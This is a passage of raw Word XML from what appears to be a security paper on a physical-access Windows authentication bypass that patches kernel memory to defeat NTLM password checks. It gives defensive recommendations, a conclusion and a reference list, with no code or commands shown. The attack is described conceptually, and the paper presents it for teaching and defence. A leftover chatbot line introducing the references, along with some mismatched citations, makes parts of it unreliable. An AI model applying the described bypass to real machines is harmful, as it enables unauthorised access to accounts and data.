        <w:ind w:left="14" w:right="1767"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For defenders:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7885107C" w14:textId="6E7AAFC6" w:rsidR="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:spacing w:after="69"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>Physical access to the device should be assumed at all times, therefore the design should take this into consideration.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Make</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> use of Full Disk Encryption (FDE) as a standard practice.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Use Virtualization, Based Security (VBS) if it is feasible and practical in your environment.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Assume that the bootloader is not trusted and therefore verify it cryptographically.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Keep track of user, mode process memory to detect any illegal modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F76F09" w14:textId="77777777" w:rsidR="00B44662" w:rsidRPr="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:spacing w:after="69"/>
        <w:ind w:left="14" w:right="1767"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For researchers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5559BB" w14:textId="77777777" w:rsidR="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:spacing w:after="69"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows security model works well if we trust the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>firmware.The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> security issue is inherent in the architecture rather than being a mere </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>accident.Fixing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> this problem requires changes at the hardware level, not software updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0DBBA2" w14:textId="77777777" w:rsidR="00B44662" w:rsidRPr="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:spacing w:after="69"/>
        <w:ind w:left="14" w:right="1767"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For system administrators:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F532E12" w14:textId="6C3EBE0C" w:rsidR="00AD5226" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:spacing w:after="69"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Without physical security, there can be no logical </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>security.Encryption</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is the one that protects data while secure boot does not protect </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>credentials.In</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> case of a system with physical access compromise, it is necessary to assume that credentials need to be changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19741DD6" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="22" w:right="673"/>
      </w:pPr>
      <w:r>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C2A8AE" w14:textId="77777777" w:rsidR="00E85008" w:rsidRDefault="00E85008" w:rsidP="00E85008">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This paper features a comprehensive technical dissection of a bypass to authentication that uses volatile kernel, mode patching. The key to the hijack of the firmware, to, kernel trust transition is the attacker who has physical access and thereby can get code execution in Ring 0, disable kernel protections, and interfere with NTLM password verification without making a persistent record of the operation. The trick is not new in essence (as a similar academic research and tools have been existing for more than ten </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>years), but the thorough examination of the architectural bases of the attack brings out the fundamental fact that if there is no persistent encryption, physical access means full logical compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C85167" w14:textId="5D438142" w:rsidR="00E85008" w:rsidRDefault="00E85008" w:rsidP="00E85008">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The protective measures (Secure Boot, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PatchGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, VBS) are there to incrementally harden the system, but they are not capable of completely removing the loophole as they rely on the firmware being trustworthy which is not the case if the attacker has control over the boot process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C0ACF2" w14:textId="5130520B" w:rsidR="00FC7A97" w:rsidRDefault="00000000" w:rsidP="00E85008">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>This paper contributes to the security research literature by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B78F0A" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1471" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Providing a detailed technical methodology </w:t>
      </w:r>
      <w:r>
        <w:t>suitable for classroom instruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F74547" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1471" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Explaining the “why” behind each attack phase </w:t>
      </w:r>
      <w:r>
        <w:t>rather than just “how”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39299C0B" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1471" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Contextualizing the attack within the Windows architecture </w:t>
      </w:r>
      <w:r>
        <w:t>showing where the trust model breaks down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C543761" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1471" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Demonstrating that theory matches practice </w:t>
      </w:r>
      <w:r>
        <w:t>through commercial tool analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DD2E80" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1471" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Identifying specific defensive mechanisms and their limitations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5B8601" w14:textId="042B210D" w:rsidR="00FC7A97" w:rsidRDefault="00000000" w:rsidP="00AD5226">
      <w:pPr>
        <w:spacing w:after="66" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The overarching conclusion: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cryptography is the only </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> against physical access; everything else is merely obstacles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F73C33" w14:textId="77777777" w:rsidR="00AD5226" w:rsidRDefault="00AD5226" w:rsidP="00AD5226">
      <w:pPr>
        <w:spacing w:after="66" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0130C13D" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="22" w:right="673"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F10E1CB" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>Here is the cleaned and formatted list of references in IEEE style:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B30BF4" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50DE6176" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>## References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4DD331" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AABEB27" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[1] C. Kallenberg, X. Kovah, J. Butterworth, and S. Cornwell, “Extreme Privilege Escalation on Windows 8 UEFI Systems,” Black Hat USA, 2014. [Online]. Available: https://blackhat.com/docs/us-14/materials/us-14-KallenbergExtreme-Privilege-Escalation-On-Windows8-UEFI-Systems.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0068DD76" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5204A460" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[2] J. Lindsay and G. Hoglund, “Attacking the Windows Kernel,” Black Hat USA, 2007. [Online]. Available: https://blackhat.com/presentations/bh-usa07/Lindsay/Whitepaper/bh-usa-07-lindsay-WP.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1722CCAC" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D12A386" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[3] P. Wardle, “The Art of Mac Malware: Crafting Sophisticated Attacks,” Security Summit, 2015.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1818A2" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A75C73C" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SafeBreach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Security Research Team, “A Zero-Restart Kernel Bypass: Exploiting Code Integrity Callback Mechanisms,” *Cyber Security Research*, 2025. [Online]. Available: https://www.linkedin.com/pulse/zero-restart-kernel-bypassexploiting-code-integrity-callback-doli-nt5qe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33690E1B" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="604EFC52" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[5] Fortinet FortiGuard Labs, “The Swan Song for Driver Signature Enforcement Tampering,” *Fortinet Blog*, 2022. [Online]. Available: https://www.fortinet.com/blog/threatresearch/driver-signature-enforcement-tampering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5132BFD0" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22F5693A" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BleepingComputer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Security News, “New Windows Driver Signature Bypass Allows Kernel Rootkit Installs,” 2024. [Online]. Available: https://www.bleepingcomputer.com/news/security/newwindows-driver-signature-bypass-allows-kernel-rootkit-installs/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD2A7AB" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B771D8B" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[7] Fortinet Threat Research, “Melting Down </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PatchGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Leveraging KPTI to Bypass Kernel Patch Protection,” 2018. [Online]. Available: https://www.fortinet.com/blog/threatresearch/melting-down-patchguard-leveraging-kpi-to-bypass-kernel-patchprotection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B52FD8" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18F93CD9" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[8] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hackyboiz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Research Team, “Bypassing Windows Kernel Mitigations: Part 1,” 2024. [Online]. Available: https://hackyboiz.github.io/2024/12/08/l0ch/bypassingkernel-mitigation-part1/en/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA02055" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16052C02" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[9] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hackyboiz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Research Team, “Bypassing Windows Kernel Mitigations: Part 2,” 2025. [Online]. Available: https://hackyboiz.github.io/2025/01/12/l0ch/bypassingkernel-mitigation-part2/en/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F75F502" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B4534FA" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[10] P. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ciholas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, M. Kalisch, and V. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kuncak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, “Fast and Furious: Outrunning Windows Kernel Notification Routines from User Mode,” *PMC National </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Center</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for Biotechnology Information*, 2020. [Online]. Available: https://pmc.ncbi.nlm.nih.gov/articles/PMC7338165/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390E4033" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C1B526" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[11] I. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Korkin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, “Windows Kernel Hijacking Is Not </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>An</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Option,” *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>arXiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>*, 2021. [Online]. Available: https://arxiv.org/pdf/2106.06065.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4F5DBB" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BCB8A33" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[12] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SafeBreach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Labs, “Process Injection Using Windows Thread Pools: Pool Party Attacks,” 2024. [Online]. Available: https://www.safebreach.com/blog/processinjection-using-windows-thread-pools/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A81BA5E" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DD77AF2" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[13] Checkpoint Research, “CVE-2025-24054: NTLM Exploit in the Wild,” 2025. [Online]. Available: https://research.checkpoint.com/2025/cve-2025-24054-ntlmexploit-in-the-wild/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9464BD" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE983CB" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[14] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cymulate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Security, “CVE-2025-50154: Zero Click, One NTLM: Patch Bypass,” 2025. [Online]. Available: https://cymulate.com/blog/zero-click-one-ntlmmicrosoft-security-patch-bypass-cve-2025-50154/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0271FA7C" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A324B6" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[15] Unit42 Palo Alto Networks, “Threat Brief: Microsoft Critical Vulnerabilities (CVE-2022-26925),” 2024. [Online]. Available: https://unit42.paloaltonetworks.com/microsoftcve-2022-26925-etc/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C446C4" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EDBA638" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[16] MITRE ATT&amp;CK Framework, “OS Credential Dumping: LSASS Memory,” 2025. [Online]. Available: https://attack.mitre.org/techniques/T1003/001/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B848417" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65CC46B6" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[17] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JumpCloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Security, “What is an LSASS Memory Dump?” 2025. [Online]. Available: https://jumpcloud.com/it-index/what-is-an-lsass-memory-dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C1A495" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D3DA9E" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[18] Elastic Security, “Credential Acquisition via Registry Hive Dumping,” 2024. [Online]. Available: https://www.elastic.co/guide/en/security/8.19/credentialacquisition-via-registry-hive-dumping.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4576CE38" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
